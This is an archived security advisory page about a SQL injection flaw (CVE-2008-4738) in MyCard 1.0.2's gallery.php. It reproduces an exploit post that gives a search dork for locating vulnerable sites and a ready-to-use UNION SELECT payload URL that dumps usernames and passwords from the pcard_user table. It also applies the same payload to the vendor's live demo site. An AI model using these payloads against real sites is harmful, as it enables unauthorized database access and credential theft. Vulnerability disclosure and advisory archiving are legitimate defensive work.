SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

MyCard 1.0.2 (gallery.php id) Remote SQL Injection Vulnerability


Arrow  SecurityAlert : 4476
Arrow  CVE : CVE-2008-4738
Arrow  CWE : CWE-89
Arrow  SecurityRisk : High  Security Risk High  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : Yes
Arrow  Credit : r45c4l
Arrow  Published : 25.10.2008

Arrow  Affected Software : tufat:mycard:1.0.2



Arrow  Advisory Content :  


# est.2007 \/ \/ forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz #
# and all darkc0de and NikTrix members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com & niktrix.info
#
# Email : r45c4l@hotmail.com
#
# Share the c0de!
#
################################################################
#
# Title: MyCard script 1.0.2 (gallery.php?id) SQL Injection
#
# VEndor: http://www.tufat.com/s_business_card_designer.htm
#
#
###########################################################
#
# d0rk: Powered by MyCard
#
###########################################################

POC :-

http://www.site.com/[path]/gallery.php?id=-1+union+select+1,concat(login_i
d,0x3a,login_pass),2,3+from+pcard_user/*

Live Demo:

For live demo first go here : http://demo.tufat.com/mycard/index.php and
register and then u can test like this :

http://demo.tufat.com/mycard/gallery.php?id=-1+union+select+1,concat(login
_id,0x3a,login_pass),2,3+from+pcard_user/*

###########################################################
#
# Bug discovered : 28 Sep.2008
###########################################################



Arrow  References :

http://www.securityfocus.com/bid/31447
http://www.milw0rm.com/exploits/6603
http://secunia.com/advisories/32039




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.